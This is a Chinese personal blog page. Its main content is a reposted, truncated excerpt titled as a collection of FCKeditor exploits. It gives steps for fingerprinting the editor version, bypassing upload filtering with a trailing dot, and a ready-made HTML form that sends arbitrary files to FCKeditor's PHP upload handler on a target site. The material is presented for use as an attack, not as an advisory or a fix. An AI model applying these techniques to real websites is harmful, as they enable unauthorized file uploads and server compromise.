English Sentence Loading...
英语句子加载中...
2013-07-20 00:38:38
欢迎阳历生日为1985年8月15日的朋友加入友情链接
长期招友情链接,做好请直接留言 MyqqAdmin@Msn.Com
木子美专题   密室之逃脱   论坛转帖器   中青基金会

浏览模式: 普通 | 列表
8月, 2010 | 1

Fckeditor 漏洞利用合集 [转]

[ 2010-08-28 19:49:18 | 作者: 璀璨年华 ]
1.查看编辑器版本
FCKeditor/_whatsnew.html

2.Version 2.2 版本
Apache+linux 环境下在上传文件后面加个.突破!测试通过。

3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。
<form id="frmUpload" enctype="multipart/form-data"
action="http://www.xxx.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
...

阅读全文...
分类: 『安全優化』 | 永久链接 | 评论: 0 | 引用: 0 | 浏览: 6986
1